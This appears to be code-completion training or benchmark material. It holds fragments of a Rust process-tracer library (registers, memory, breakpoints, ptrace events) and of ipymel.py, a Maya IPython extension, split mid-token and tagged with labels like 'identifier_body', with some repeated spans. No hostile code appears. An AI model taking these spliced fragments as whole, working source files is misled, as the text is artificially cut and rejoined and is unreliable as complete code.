/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct Tracer {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a | /// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be | random_line_split |
|
lib.rs | }
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct | {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a
/// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would | Tracer | identifier_name |
ipymel.py | # and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
| num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree | identifier_body |
|
ipymel.py | ):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler() | random_line_split |
||
ipymel.py | ()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
|
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList | raise TryNext | conditional_block |
ipymel.py | yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
